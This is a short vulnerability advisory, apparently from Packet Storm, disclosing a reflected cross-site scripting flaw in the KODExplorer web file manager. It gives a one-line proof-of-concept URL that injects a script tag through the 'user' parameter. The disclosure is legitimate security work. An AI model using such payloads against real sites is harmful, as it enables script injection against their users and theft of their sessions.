KODExplorer web file manager suffers from a cross site scripting vulnerability.
a0105f30c9687518ec81049807bbf8fb7193299431ee0d621c176c069d12cadb
================================================================================
# KODExplorer web file manager - Cross Site Scripting
================================================================================
# Vendor Homepage: https://github.com/kalcaddle/KODExplorer/ - https://kalcaddle.com/
# Date: 30-Dec-2015
# Software Link: https://github.com/kalcaddle/KODExplorer/archive/master.zip
# Exploit Author : Ben Khlifa Fahmi - Xtnr3v0lt
================================================================================
# Vulnerable File : file.php
# Vulnerable Code : check line 55 on the template/file.php
# PoC :
https://localhost/index.php?share/file&user=admin"></script><script>alert('xss')</script>&sid=
Vulnerable Parameters : admin , sid
Patch released : Check my git https://github.com/xtnr3v0lt/KODExplorer
================================================================================
# Discovered By : Ben Khlifa Fahmi(https://www.benkhlifa.com/) from Tunisian Whitehats Security (@WhitehatsTN)
================================================================================
Special Thanks to both the community Tunisian Whitehats Security and Arab Oracle Users Group
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed